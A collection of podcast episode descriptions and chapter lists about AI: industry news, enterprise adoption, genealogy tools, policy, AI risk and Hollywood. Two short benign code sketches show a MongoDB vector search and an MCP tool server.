AI Applied YouTube Channel: https://www.youtube.com/@AI-Applied-Podcast
Try AI Box: https://aibox.ai
Conor's AI Course: https://www.ai-mindset.ai/courses
Conor's AI Newsletter: https://www.ai-mindset.ai/
Jaeden's AI Hustle Community: https://www.skool.com/aihustle
YouTube Video: https://youtu.be/eNq5jNraoCg
Chapters
00:00 AI and Child Safety Controversy
04:36 Meta's Response and Accountability
09:17 Implications for AI Development and Future Safety
The rapid growth of artificial intelligence is creating a data center boom, but decades-old environmental protections are slowing efforts by big tech to build massive facilities. Wired Magazine has found that companies are asking the White House to ease those protections, and the Trump administration appears to be all in. Ali Rogin speaks with Wired senior reporter Molly Taft for more. PBS News is supported by - https://www.pbs.org/newshour/about/funders. Hosted on Acast. See acast.com/privacy
Alex Gleason was one of the main architects behind Donald Trump's Truth Social. Now he focuses on the intersection of nostr, ai, and bitcoin. We explore his latest tool, Shakespeare, which enables anyone to easily vibe code an app in their browser. I vibe my first app live on air.
Alex on Nostr: https://primal.net/p/nprofile1qqsqgc0uhmxycvm5gwvn944c7yfxnnxm0nyh8tt62zhrvtd3xkj8fhggpt7fy
Shakespeare: https://shakespeare.diy/
Soapbox Tools: https://soapbox.pub/tools
The app I vibed live: https://followstream-3slf.shakespeare.to/
EPISODE: 174
BLOCK: 910195
PRICE: 853 sats per dollar
(00:00:01) Treasury Secretary Bessent Intro
(00:01:29) Happy Bitcoin Friday
(00:05:12) AI and Freedom Online
(00:07:04) Shakespeare: Vibe Coding Made Simple
(00:08:03) Concerns About Big AI
(00:15:05) Self Hosting AI and Technical Challenges
(00:22:24) Energy and AI Development
(00:28:14) Building Personalized Experiences with AI
(00:38:02) Nostr's Future and Mainstream Adoption
(00:45:02) Decentralized Hosting and Shakespeare's Future
(00:54:01) Collaborative Development with Nostr Git
(01:02:24) Open Source Renaissance and Future Prospects
Video: https://primal.net/e/nevent1qqstzds6pmkpaser62kme8dk74r4ea4ae3hv9fr2wur0kpc3yyws96gx2pa59
more info on the show: https://citadeldispatch.com
learn more about me: https://odell.xyz
Bryan Murphy, CEO of Smartling, confronts a $40 billion industry stuck in the slow lane, the world of translation. Most companies still handle translations like it's 1999: manual, expensive, and painfully slow. Bryan saw AI as the game changer that could rewrite the rules, but integrating it wasn't a walk in the park. He shares how Smartling harnessed AI to not just cut costs and speed up translation but to finally boost quality close to human-level precision without losing control over brand voice or nuance. Yet, making this leap meant upheaval: reorganizing teams, hiring AI experts, and establishing ruthless R&D discipline to separate winning ideas from distractions. Thanks for tuning in! New episodes of Topline drop every Sunday and Thursday. Don't miss GTM2025 — the only B2B tech conference exclusively for GTM executives. Elevate your 2026 strategy and join us from September 23 to 25 in Washington, D.C. Use code TOPLINE for 10% off your GA ticket. Stay ahead with the latest industry developments and emerging go-to-market trends with Topline Newsletter by Asad Zaman. Subscribe today. Tune in to The Revenue Leadership Podcast every Wednesday, where host Kyle Norton talks with real revenue operators and dives deep into what it takes to succeed as a modern revenue leader. You're invited! Join the free Topline Slack channel to connect with 600+ revenue leaders, share insights, and keep the conversation going beyond the podcast! Key chapters: (00:00) - Introduction to Bryan Murphy and Defining the Translation Challenge (02:30) - The Hidden $40B Translation Market and Its Untapped Potential (04:00) - The Evolution of Translation Services: From Manual to AI-Driven Automation (06:00) - Early AI in Translation: Faster and Cheaper, But Not Yet Better (08:00) - Defining Quality: The MQM Standard and Bridging AI-Human Gaps (09:20) - Human-in-the-Loop AI: Boosting Translator Productivity Tenfold (10:30) - Full AI Translation Approaching Human Grade: The Game Changer (11:45) - The Future Mix: Human Expertise vs. Automated Scale in AI Translation (13:00) - Unlocking Market Expansion Through Improved SEO and Digital Footprint (15:00) - The Moment of Truth: Recognizing GPT's Impact and Rolling Out Rapid Innovation (16:30) - Founder's Speed: Breaking Plans and Aligning Teams for Urgent AI Adoption (18:00) - Overcoming Organizational Challenges: From Excitement to Structured Execution (20:00) - R&D Reimagined: Timeboxing Experiments With Clear Metrics to Avoid Spinning Wheels (22:00) - The Discipline of “Customer-First” in AI Development and Roadmapping (24:00) - Leadership Lessons: Listening Without Losing Vision Amidst Painful Change (26:00) - Winning Customer Trust: Betting On Proofs of Concept Against Skeptics (28:00) - Personal Insights: Favorite Leadership Books and the Role of Intellectual Curiosity (29:30) - Staying Sharp: Daily Reading and Customer Conversations as Strategic Tools (31:00) - Managing Stress and Longevity: The Art of Mental Compartmentalization for Founders (32:30) - Final Thoughts: The Unseen Power of Humility in Leadership and Continual Learning (33:00) - Wrap-up and Invitation to Follow Smartling's AI-Empowered Evolution
Co-hosts Mark Thompson and Steve Little explore the groundbreaking release of ChatGPT-5, which arrived after over a year of anticipation. They discuss how this new model transforms the AI landscape with better reasoning, larger context windows, and dramatically reduced hallucinations.
The hosts examine OpenAI's new Study and Learn Mode, which acts as a personal tutor rather than just providing answers, making it ideal for genealogists who want to deepen their understanding of their favourite topic.
This week's Tip of the Week cautions beginners about challenging AI tasks like handwritten transcriptions and structured files, recommending they master the basics first.
In RapidFire, they cover OpenAI's first open-source release since 2019, NotebookLM's video capabilities, and impressive AI company earnings reports.
Timestamps:
In the News:
00:55 ChatGPT-5 Has Arrived: Improved Features (mostly) for Genealogists
16:29 OpenAI's Study and Learn Mode: Your Personal Genealogy Tutor
23:40 Claude Releases Opus 4.1: Enhanced Reasoning and Writing
Tip of the Week:
29:25 AI Tasks for Beginners to Be Cautious Of
RapidFire:
40:16 OpenAI Releases First Open Source Model Since 2019
48:33 NotebookLM Upgrade Adds Video Support
53:34 AI Companies Report Record Earnings
Resource Links
Introduction to Family History AI
https://tixoom.app/fhaishow/
OpenAI GPT-5 Model Card
https://openai.com/index/gpt-5-system-card/
Introducing study mode
https://openai.com/index/chatgpt-study-mode/
ChatGPT Study Mode - FAQ
https://help.openai.com/en/articles/11780217-chatgpt-study-mode-faq
Claude Opus 4.1
https://www.anthropic.com/news/claude-opus-4-1
OpenAI announces two "gpt-oss" open AI models
https://arstechnica.com/ai/2025/08/openai-releases-its-first-open-source-models-since-2019/
Google's NotebookLM rolls out Video Overviews
https://techcrunch.com/2025/07/29/googles-notebooklm-rolls-out-video-overviews/
Tech bubble going pop: AI pays the price for inflated expectations
https://www.theguardian.com/commentisfree/article/2024/aug/07/the-guardian-view-on-a-tech-bubble-going-pop-ai-pays-the-price-for-inflated-expectations
Is The AI Bubble About To Burst?
https://www.forbes.com/sites/bernardmarr/2024/08/07/is-the-ai-bubble-about-to-burst/
Google loses appeal in antitrust battle with Fortnite maker
https://masslawyersweekly.com/2025/08/06/google-play-monopoly-verdict-epic-games-win/
Department of Justice Prevails in Landmark Antitrust Case Against Google
https://www.justice.gov/opa/pr/department-justice-prevails-landmark-antitrust-case-against-google
Tags: Artificial Intelligence, Technology, Genealogy, Family History, OpenAI, ChatGPT-5, Claude, Large Language Models, AI Learning Tools, Study Mode, Open Source AI, NotebookLM, Video Overviews, AI Reasoning, Context Windows, Hallucination Reduction, GEDCOM Files, Handwritten Transcription, Document Analysis, AI Earnings, Google Antitrust, Apache License, Local AI Processing, Privacy, AI Education, Tutoring Systems, Coding Capabilities, Multilingual Processing, AI Development, Family History Research, Genealogists, AI Tools, Machine Learning
- Discovery of Secret Room in FBI Building (0:11) - Criticism of FBI and Intelligence Agencies (1:24) - Challenges with Burn Bags and Document Destruction (2:48) - Lack of Arrests and Legal Challenges (5:26) - Summary of Document Findings (9:25) - Trump Administration's Legal Strategy (11:54) - Hopes for Mass Arrests (15:08) - Challenges with Power Grid and AI Data Centers (25:17) - Impact of Tariffs on Transformer Supply (46:48) - Future of Energy and Decentralized Solutions (1:09:21) - Introduction of Enoch AI Engine (1:15:24) - Challenges with AI Data and Personal Experiences (1:25:51) - Development and Performance of the AI Engine (1:28:19) - Decentralization and Open-Source AI (1:30:34) - Training Data and AI Capabilities (1:33:59) - Prompt Engineering and AI Applications (1:40:28) - Challenges and Future of AI Development (1:55:27) - Censorship and Regulatory Concerns (1:57:29) - Global AI Competition and Technological Advancements (2:06:23) - Economic and Political Implications of AI (2:18:04) - Geopolitical Shifts and Centralized Power (2:25:24) - Demoralization and Betrayal of American Dream (2:39:28) - Apocalypse Accelerationism and Christian Zionism (2:42:43) - Critique of Religious Institutions and Their Teachings (2:46:44) - Historical Context and Modern Implications (2:49:42) - Cults and Their Influence on Global Events (2:52:32) - The Role of Media and Education in Shaping Perceptions (2:55:27) - The Impact of Religious Supremacy on Global Conflict (3:12:55) - The Role of Individual Actions in Promoting Peace (3:19:24) - The Future of Global Peace and Understanding (3:21:06) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
In this episode of Tech Talks Daily, I sat down with Boris Bialek, VP and Field CTO at MongoDB, for a conversation that moved well beyond databases. As AI continues to accelerate across sectors, MongoDB is positioning itself at the intersection of modern data architecture and intelligent application development. Boris shared how his team is simplifying AI adoption for enterprises, with a clear focus on real-world outcomes, developer productivity, and global inclusion. We began by exploring MongoDB's recent acquisition of Voyage AI. This move extends MongoDB's native capabilities into vector search, embeddings, and re-rankers, allowing developers to build AI-powered applications more efficiently. Boris explained how MongoDB is removing the complexity from AI integration by providing a unified API, collapsing what used to be 18 disconnected tools into a streamlined developer experience. But the discussion wasn't just about technology. Boris brought a passionate focus to the issue of financial inclusion. We talked about how AI can enable alternative credit scoring for the 27 percent of adults globally who remain unbanked. By analyzing behavioral signals such as mobile payment histories or utility data, AI can help unlock microcredit opportunities for individuals and small businesses in underserved regions. Boris shared use cases from PicPay in Brazil, M-Pesa in Africa, and Proxtera in Singapore, each demonstrating how AI and MongoDB are enabling new forms of digital trust. We also tackled the organizational and technical hurdles to enterprise AI adoption. From fears about hallucinations to managing constant model updates, Boris described how MongoDB is building systems that prioritize transparency, auditability, and scale. With its document model and integrated tooling, MongoDB offers a stable foundation for companies navigating fast-moving AI transformations. For developers, the platform now includes learnmongodb.com and quick-skill badges designed to make AI approachable and hands-on. And with the upcoming release of Boris's new book, there's more to come on how businesses can move from pilot experiments to production-grade solutions. How is your organization rethinking its data strategy to make AI work at scale?
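As a rough picture of what the vector search capability discussed above looks like from a developer's side, here is a short sketch of an Atlas Vector Search query through PyMongo. The connection string, collection, index name, field names, and embedding function are placeholders invented for illustration, and pipeline options can vary by MongoDB version, so treat this as an orientation aid rather than MongoDB's documented recipe.

```python
from pymongo import MongoClient

# Placeholder connection string; swap in your own cluster URI.
client = MongoClient("mongodb+srv://user:pass@cluster.example.mongodb.net")
collection = client["shop"]["products"]

def embed(text: str) -> list[float]:
    # Stand-in for a real embedding model (e.g. a Voyage AI encoder).
    # The dimension must match the vector index; 1024 is just an example.
    return [0.0] * 1024

def semantic_search(query: str, limit: int = 5):
    # $vectorSearch runs an approximate nearest-neighbour search against a
    # pre-built Atlas vector index on the stored embedding field.
    pipeline = [
        {
            "$vectorSearch": {
                "index": "product_embeddings",     # hypothetical index name
                "path": "description_embedding",   # field holding stored vectors
                "queryVector": embed(query),
                "numCandidates": 100,
                "limit": limit,
            }
        },
        {"$project": {"name": 1, "score": {"$meta": "vectorSearchScore"}}},
    ]
    return list(collection.aggregate(pipeline))
```

The point Boris makes about a "unified API" is visible here: the vector query is just another aggregation stage alongside the rest of the application's data access, rather than a separate vector database with its own client and sync pipeline.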
Kent C. Dodds is back with bold ideas and a game-changing vision for the future of AI and web development. In this episode, we dive into the Model Context Protocol (MCP), the power behind Epic AI Pro, and how developers can start building Jarvis-like assistants today. From replacing websites with MCP servers to reimagining voice interfaces and AI security, Kent lays out the roadmap for what's next, and why it matters right now. Don't miss this fast-paced conversation about the tools and tech reshaping everything. Links Website: https://kentcdodds.com X: https://x.com/kentcdodds Github: https://github.com/kentcdodds YouTube: https://www.youtube.com/c/kentcdodds-vids Twitch: https://www.twitch.tv/kentcdodds LinkedIn: https://www.linkedin.com/in/kentcdodds Resources Please make Jarvis (so I don't have to): https://www.epicai.pro/please-make-jarvis AI Engineering Posts by Kent C. Dodds: https://www.epicai.pro/posts We want to hear from you! How did you find us? Did you see us on Twitter? In a newsletter? Or maybe we were recommended by a friend? Let us know by sending an email to our producer, Em, at emily.kochanek@logrocket.com (mailto:emily.kochanek@logrocket.com), or tweet at us at PodRocketPod (https://twitter.com/PodRocketpod). Follow us. Get free stickers. Follow us on Apple Podcasts, fill out this form (https://podrocket.logrocket.com/get-podrocket-stickers), and we'll send you free PodRocket stickers! What does LogRocket do? LogRocket provides AI-first session replay and analytics that surfaces the UX and technical issues impacting user experiences. Start understanding where your users are struggling by trying it for free at LogRocket.com. Try LogRocket for free today. (https://logrocket.com/signup/?pdr) Special Guest: Kent C. Dodds.
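For readers who want a concrete sense of what "building an MCP server" means in practice, below is a minimal sketch using the official Model Context Protocol Python SDK's FastMCP helper. The server name, tool, and data are made up for illustration, the SDK surface may have shifted since this episode aired, and it is not taken from Kent's Epic AI material.

```python
# pip install mcp  (the official Model Context Protocol Python SDK)
from mcp.server.fastmcp import FastMCP

# Hypothetical server exposing one tool an MCP-capable assistant could call.
mcp = FastMCP("journal-demo")

# Toy in-memory data; a real server would talk to your app's database or API.
ENTRIES = {"2025-01-01": "Started learning MCP."}

@mcp.tool()
def get_journal_entry(date: str) -> str:
    """Return the journal entry for a given ISO date, if any."""
    return ENTRIES.get(date, f"No entry found for {date}.")

if __name__ == "__main__":
    # Serve the tool over stdio so a local MCP client (for example, an
    # AI assistant) can discover and invoke it.
    mcp.run()
```

Once a client connects, it can list this server's tools and call get_journal_entry without any custom glue code, which is the interoperability idea behind the "replace the website with an MCP server" argument in the episode.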
Canada's AI Future: Navigating Challenges and Opportunities
In this episode of Hashtag Trending on the Weekend, host Jim Love interviews Steven Karan, Vice President of AI and Data at Capgemini Canada. They discuss Canada's role in the global AI landscape, the current state of AI investment, and the importance of developing local talent and infrastructure to compete internationally. Steven highlights the need for Canada to adopt a cohesive national AI strategy, prioritize investments, and leverage its collaborative nature to lead in open-source AI development. The conversation also touches on the impact of AI on the younger generation and the crucial steps required to prepare them for future job markets. 00:00 Introduction and Guest Welcome 00:34 Overview of Capgemini and Steven's Role 01:28 The Pivotal Point of AI in Canada 02:19 Canada's Position in the Global AI Landscape 04:09 Challenges and Opportunities for AI Talent in Canada 08:50 The Importance of Scaling AI 13:46 Investment and Infrastructure Needs 17:19 The Role of Government in AI Development 20:48 A Vision for Canada's AI Future 23:08 Revolutionizing Healthcare with AI 24:25 The Trust Dilemma in Autonomous Agents 25:18 Championing Open Source AI 26:34 Addressing AI Skepticism 28:46 Human-AI Collaboration 36:45 Preparing the Next Generation for AI 44:26 Conclusion and Final Thoughts
- Organ Harvesting Nightmare (0:11) - Trump vs. BRICS: The Global Currency War (26:06) - The AI Race and US Energy Production (36:54) - The Economic and Social Implications of AI (1:15:35) - The Role of Free Energy Technology (1:15:57) - The Future of AI and Energy (1:18:37) - The Economic and Political Landscape (1:18:53) - The Role of Government and Industry (1:19:13) - The Impact of Energy Policy on AI Development (1:19:30) - The Future of Energy and AI (1:19:50) - Texas Power Grid and AI Data Centers (1:20:05) - Impact of AI Data Centers on Residential Units (1:25:59) - Challenges of Diesel Generators and Copper Costs (1:26:27) - Historical Decisions and Infrastructure Sabotage (1:30:00) - Global Power and AI Dominance (1:32:29) - Economic and Political Implications (1:33:24) - Preparation for Economic Collapse (1:35:57) - Interview with Bill Holter (1:48:51) - Silver Market and Failure to Deliver (2:10:12) - Societal Impact of Economic Collapse (2:22:13) - Preparedness for Survival Scenarios (2:27:36) - Practical Preparedness Tips (2:41:53) - Final Thoughts and Advice (2:42:55) - Product Promotion and Health Advice (2:43:57) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Time now for our daily Tech and Business Report. Today, the White House has released what it's calling an AI Action Plan with the hope of boosting the development of artificial intelligence in the United States. For more, KCBS Radio anchor Holly Quan spoke with Bloomberg Politics Reporter Stephanie Lai.
For episode 549 of the BlockHash Podcast, host Brandon Zemp is joined by Rowan Stone, CEO of Sapien.
Data is the biggest opportunity in AI. That's why Sapien has built a global community where anyone can contribute to AI development through engaging tasks. On Sapien, AI Workers are automatically matched with optimal tasks based on their skills and preferences. Learn more at https://earn.sapien.io
⏳ Timestamps:
0:00 | Introduction
1:00 | Who is Rowan Stone?
5:03 | What is Sapien?
9:02 | How to contribute data with Sapien
11:40 | Limitations on contribution
16:00 | What do Tasks look like?
20:38 | How to eliminate AI biases
23:33 | Sapien use-cases
26:03 | Future of decentralized model training
29:12 | Sapien roadmap
31:33 | Sapien website, socials & community
AI Applied: Covering AI News, Interviews and Tools - ChatGPT, Midjourney, Runway, Poe, Anthropic
In this episode, Conor and Jaeden discuss Meta's rapid evolution from social media to AI, highlighting Zuckerberg's aggressive hiring strategy and the construction of colossal data centers. They explore the implications of these developments, including the environmental impact of AI and the competitive landscape in the tech industry.
AI Applied YouTube Channel: https://www.youtube.com/@AI-Applied-Podcast
Try AI Box: https://AIBox.ai/
Conor's AI Course: https://www.ai-mindset.ai/courses
Conor's AI Newsletter: https://www.ai-mindset.ai/
Jaeden's AI Hustle Community: https://www.skool.com/aihustle/about
YouTube Video: https://youtu.be/nJ2pMQxTSic
Chapters
00:00 Meta's Rapid Evolution in AI
02:05 Zuckerberg's Talent Acquisition Strategy
08:42 The Scale of Meta's Data Centers
12:27 Environmental Considerations in AI Development
Co-hosts Mark Thompson and Steve Little examine the controversial rise of AI image "restoration" and discuss how entirely new images are being generated, rather than the original photos being restored. This is raising concerns about the preservation of authentic family photos.
They discuss Mark's reconsideration of canceling his Perplexity subscription after rediscovering its unique strengths for supporting research.
The hosts analyze recent court rulings that permit AI training on legally acquired content, plus Disney's ongoing case against Midjourney.
This week's Tip of the Week explores how project workspaces in ChatGPT and Claude can greatly simplify your genealogical research.
In RapidFire, the hosts cover Meta's aggressive AI hiring spree, the proliferation of AI tools in everyday software, including a new genealogy transcription tool from Dan Maloney, and the importance of reading AI news critically.
Timestamps:
In the News:
06:50 The Pros and Cons of "Restoring" Family Photos with AI
23:58 Mark is Cancelling Perplexity... Maybe
32:33 AI Copyright Cases Are Starting to Work Their Way Through the Courts
Tip of the Week:
40:09 How Project Workspaces Help Genealogists Stay Organized
RapidFire:
48:51 Meta Goes on a Hiring Spree
56:09 AI Is Everywhere!
01:06:00 Reading AI News Responsibly
Resource Links
OpenAI: Introducing 4o Image Generation https://openai.com/index/introducing-4o-image-generation/
Perplexity https://www.perplexity.ai/
How does Perplexity work? https://www.perplexity.ai/help-center/en/articles/10352895-how-does-perplexity-work
Anthropic wins key US ruling on AI training in authors' copyright lawsuit https://www.reuters.com/legal/litigation/anthropic-wins-key-ruling-ai-authors-copyright-lawsuit-2025-06-24/
Meta wins AI copyright lawsuit as US judge rules against authors https://www.theguardian.com/technology/2025/jun/26/meta-wins-ai-copyright-lawsuit-as-us-judge-rules-against-authors
Disney, Universal sue image creator Midjourney for copyright infringement https://www.reuters.com/business/media-telecom/disney-universal-sue-image-creator-midjourney-copyright-infringement-2025-06-11/
Disney and Universal Sue A.I. Firm for Copyright Infringement https://www.nytimes.com/2025/06/11/business/media/disney-universal-midjourney-ai.html
Projects in ChatGPT https://help.openai.com/en/articles/10169521-projects-in-chatgpt
Meta shares hit all-time high as Mark Zuckerberg goes on AI hiring blitz https://www.cnbc.com/2025/06/30/meta-hits-all-time-mark-zuckerberg-ai-blitz.html
Here's What Mark Zuckerberg Is Offering Top AI Talent https://www.wired.com/story/mark-zuckerberg-meta-offer-top-ai-talent-300-million/
Genealogy Assistant AI Handwritten Text Recognition Tool https://www.genea.ca/htr-tool/
Borland Genetics https://borlandgenetics.com/
Illusion of Thinking https://machinelearning.apple.com/research/illusion-of-thinking
Simon Willison: Seven replies to the viral Apple reasoning paper -- and why they fall short https://simonwillison.net/2025/Jun/15/viral-apple-reasoning-paper/
MIT: Your Brain on ChatGPT https://www.media.mit.edu/projects/your-brain-on-chatgpt/overview/
MIT researchers say using ChatGPT can rot your brain. The truth is a little more complicated https://theconversation.com/mit-researchers-say-using-chatgpt-can-rot-your-brain-the-truth-is-a-little-more-complicated-259450
Guiding Principles for Responsible AI in Genealogy https://craigen.org/
Tags
Artificial Intelligence, Genealogy, Family History, AI Tools, Image Generation, AI Ethics, Perplexity, ChatGPT, Claude, Meta, Copyright Law, AI Training, Photo Restoration, Project Management, AI Development, Research Tools, Responsible AI Use, GRIP, AI News Analysis, Vibe Coding, Coalition for Responsible AI in Genealogy, AI Hiring, Dan Maloney, Handwritten Text Recognition
Ethan Mollick, Professor of Management and author of the "One Useful Thing" Substack, joins Kevin Frazier, the AI Innovation and Law Fellow at the University of Texas School of Law and a Senior Editor at Lawfare, and Alan Rozenshtein, Associate Professor at Minnesota Law and a Senior Editor at Lawfare, to analyze the latest research in AI adoption, specifically its use by professionals and educators. The trio also analyze the trajectory of AI development and related, ongoing policy discussions.
More of Ethan Mollick's work: https://www.oneusefulthing.org/
Find Scaling Laws on the Lawfare website, and subscribe to never miss an episode.
To receive ad-free podcasts, become a Lawfare Material Supporter at www.patreon.com/lawfare. You can also support Lawfare by making a one-time donation at https://givebutter.com/lawfare-institute.
Support this show http://supporter.acast.com/lawfare.
Hosted on Acast. See acast.com/privacy for more information.
How can AI tech help you write better code? Carl and Richard talk to Mark Miller about the latest AI features coming in CodeRush. Mark talks about focusing on a fast and cost-effective AI assistant driven by voice, so you don't have to switch to a different window and type. The conversation also explores the rapid evolution of software development and how AI technologies help developers accomplish more in less time.
In this episode of Scaling Laws, Alan and Kevin are joined by Ethan Mollick, Professor of Management at Wharton specializing in entrepreneurship and innovation, to discuss the current state of AI growth, focusing on scaling laws, the future of AGI, and the challenges of integrating AI into society. They explore the bottlenecks in AI adoption, particularly the role of interfaces and the uncertainty surrounding AI development. Mollick discusses the transformative potential of AI in various fields, particularly education and medicine, the need for empirical research to understand AI's impact, the importance of adapting teaching methods, and the challenges of cognitive de-skilling.
More of Ethan Mollick's work: https://www.oneusefulthing.org/
Hosted on Acast. See acast.com/privacy for more information.
In this episode, we explore the rise of AI in Hollywood through the lens of actors and artists. We discuss the promise of AI tools—like virtual readers for self-tapes—and how they could free creatives to focus on their craft, but also warn of the risks when AI replaces human storytelling. Our guest stresses the need for diverse ethical oversight in AI development, drawing parallels to how Facebook's unintended global impact stemmed from a lack of diverse perspectives at creation. Learn why we need more "naysayers" guiding AI's creative applications, where to draw the line between useful automation and creative displacement, and how tech-savvy actors can advocate for their future. Tune in for a timely conversation on balancing innovation and ethics in Hollywood's AI era.
Target Keywords
AI in Hollywood
Hollywood AI ethics
Actors and AI tools
AI creative jobs risk
AI entertainment future
Tags: AI, Hollywood, AI Ethics, Actors, AI in Entertainment, Creative AI Tools, Self-Tapes, Ethical AI, Tech in Film, AI Risks, Storytelling, Virtual Readers, AI Oversight, Diversity in AI, Creative Automation, AI Jobs, Film Industry Trends, Casting Tech, AI Development, Actor Advocacy, Innovation, Digital Ethics, Future of Acting, Machine Learning, Entertainment Technology, Tech Experts, Artist Perspectives, AI Regulation, Career Impact, Podcast Episode
Hashtags: #AIinHollywood #HollywoodEthics #ActorsAndAI #CreativeAI #EntertainmentTech #AIrisks #AItools #FilmInnovation #Storytelling #EthicalAI #DiversityInTech #SelfTapes #CastingTech #AIoversight
For episode 534 of the BlockHash Podcast, host Brandon Zemp is joined by Jawad Ashraf, CEO of Vanar Chain, to discuss how they are the intelligent chain for real-world finance.
Vanar Chain is working on their innovative Neutron AI Compression technology. Neutron introduces advanced AI-driven compression, enabling a 50MB file to fit into a mere 25-50 character seed stored directly on-chain. This innovation eliminates reliance on external storage systems, dramatically reducing costs and improving blockchain scalability and efficiency.
⏳ Timestamps:
0:00 | Introduction
1:04 | Who is Jawad Ashraf?
8:10 | What is Vanar Chain?
16:34 | Vanar Chain ecosystem
20:56 | Developer resources
22:20 | Innovation in on-chain data storage
25:50 | Consumer usability in Web3
30:57 | Future of Semantic Internet
36:40 | Vanar Chain roadmap for 2025
38:08 | Conferences and Events
38:50 | Web3 in Dubai
40:48 | Vanar website, socials & community
In this episode of Cybersecurity Today, host Jim Love is joined by Krish Banerjee, the Canada Managing Director at Accenture for AI and Data. They begin the discussion with a report from Accenture that highlights the gap between the perceived and actual preparedness for cybersecurity as AI becomes more integrated into business operations. Jim and Krish discuss the pressing need for businesses to implement AI responsibly while addressing cybersecurity concerns. They also touch upon the current state of AI in Canada, efforts towards digital sovereignty, and the importance of integrating AI thoughtfully into various sectors. Through their insightful conversation, they explore the challenges and opportunities that lie ahead in making AI a cornerstone of productivity and innovation in the enterprise, emphasizing the need for value-driven strategies, the right tools, and skilled talent. 00:00 Introduction and Overview 02:10 AI in the Enterprise: Challenges and Opportunities 03:17 The Evolution of Data and AI 06:42 Enterprise AI: Current State and Future Prospects 15:20 Digital Sovereignty and National AI Strategies 25:07 Accelerating Technological Advancements 26:18 Dream Projects and AI for Good 27:58 Reinventing Healthcare with AI 28:42 Commercializing AI for Canadian Businesses 30:30 The Responsibility of AI Development 31:02 Economic Shifts and AI's Role 31:57 Future Predictions for AI 35:31 Agentic AI: The Next Frontier 41:14 Open Source AI and Its Implications 43:32 Advice for Executives on AI Adoption 47:13 Encouraging AI Learning in the Next Generation 49:10 Final Thoughts and Reflections
Recently, concerns about the risks of Artificial Intelligence and the need for 'alignment' have been flooding our cultural discourse – with Artificial Super Intelligence acting as both the most promising goal and the most pressing threat. But amid the moral debate, there's been surprisingly little attention paid to a basic question: do we even have the technical capability to guide where any of this is headed? And if not, should we slow the pace of innovation until we better understand how these complex systems actually work?
In this episode, Nate is joined by Artificial Intelligence developer and researcher Connor Leahy to discuss the rapid advancements in AI, the potential risks associated with its development, and the challenges of controlling these technologies as they evolve. Connor also explains the phenomenon of what he calls 'algorithmic cancer' – AI-generated content that crowds out true human creations, propelled by algorithms that can't tell the difference. Together, they unpack the implications of AI acceleration, from widespread job disruption and energy-intensive computing to the concentration of wealth and power in tech companies.
What kinds of policy and regulatory approaches could help slow down AI's acceleration in order to create safer development pathways? Is there a world where AI becomes a tool to aid human work and creativity, rather than replacing it? And how do these AI risks connect to the deeper cultural conversation about technology's impacts on mental health, meaning, and societal well-being?
(Conversation recorded on May 21st, 2025)
About Connor Leahy: Connor Leahy is the founder and CEO of Conjecture, which works on aligning artificial intelligence systems by building infrastructure that allows for the creation of scalable, auditable, and controllable AI. Previously, he co-founded EleutherAI, which was one of the earliest and most successful open-source Large Language Model communities, as well as a home for early discussions on the risks of those same advanced AI systems. Prior to that, Connor worked as an AI researcher and engineer for Aleph Alpha GmbH.
Show Notes and More
Watch this video episode on YouTube
Want to learn the broad overview of The Great Simplification in 30 minutes? Watch our Animated Movie.
---
Support The Institute for the Study of Energy and Our Future
Join our Substack newsletter
Join our Discord channel and connect with other listeners
In this thought-provoking episode of Project Synapse, host Jim and his friends Marcel Gagne and John Pinard delve into the complexities of artificial intelligence, especially in the context of cybersecurity. The discussion kicks off by revisiting a blog post by Sam Altman about reaching a 'Gentle Singularity' in AI development, where progress toward artificial superintelligence seems inevitable. They explore the idea of AI surpassing human intelligence and the implications of machines learning to write their own code. Throughout their engaging conversation, they emphasize the need to integrate security into AI systems from the start, rather than as an afterthought, citing recent vulnerabilities like Echo Leak and Microsoft Copilot's zero-click flaw. Derailing into stories from the past and pondering philosophical questions, they wrap up by urging a balanced approach in which speed and thoughtful planning coexist, and by calling for human welfare to be prioritized in technological advancements. This episode serves as a captivating blend of storytelling, technical insights, and ethical debates. 00:00 Introduction to Project Synapse 00:38 AI Vulnerabilities and Cybersecurity Concerns 02:22 The Gentle Singularity and AI Evolution 04:54 Human and AI Intelligence: A Comparison 07:05 AI Hallucinations and Emotional Intelligence 12:10 The Future of AI and Its Limitations 27:53 Security Flaws in AI Systems 30:20 The Need for Robust AI Security 32:22 The Ubiquity of AI in Modern Society 32:49 Understanding Neural Networks and Model Security 34:11 Challenges in AI Security and Human Behavior 36:45 The Evolution of Steganography and Prompt Injection 39:28 AI in Automation and Manufacturing 40:49 Crime as a Business and Security Implications 42:49 Balancing Speed and Security in AI Development 53:08 Corporate Responsibility and Ethical Considerations 57:31 The Future of AI and Human Values
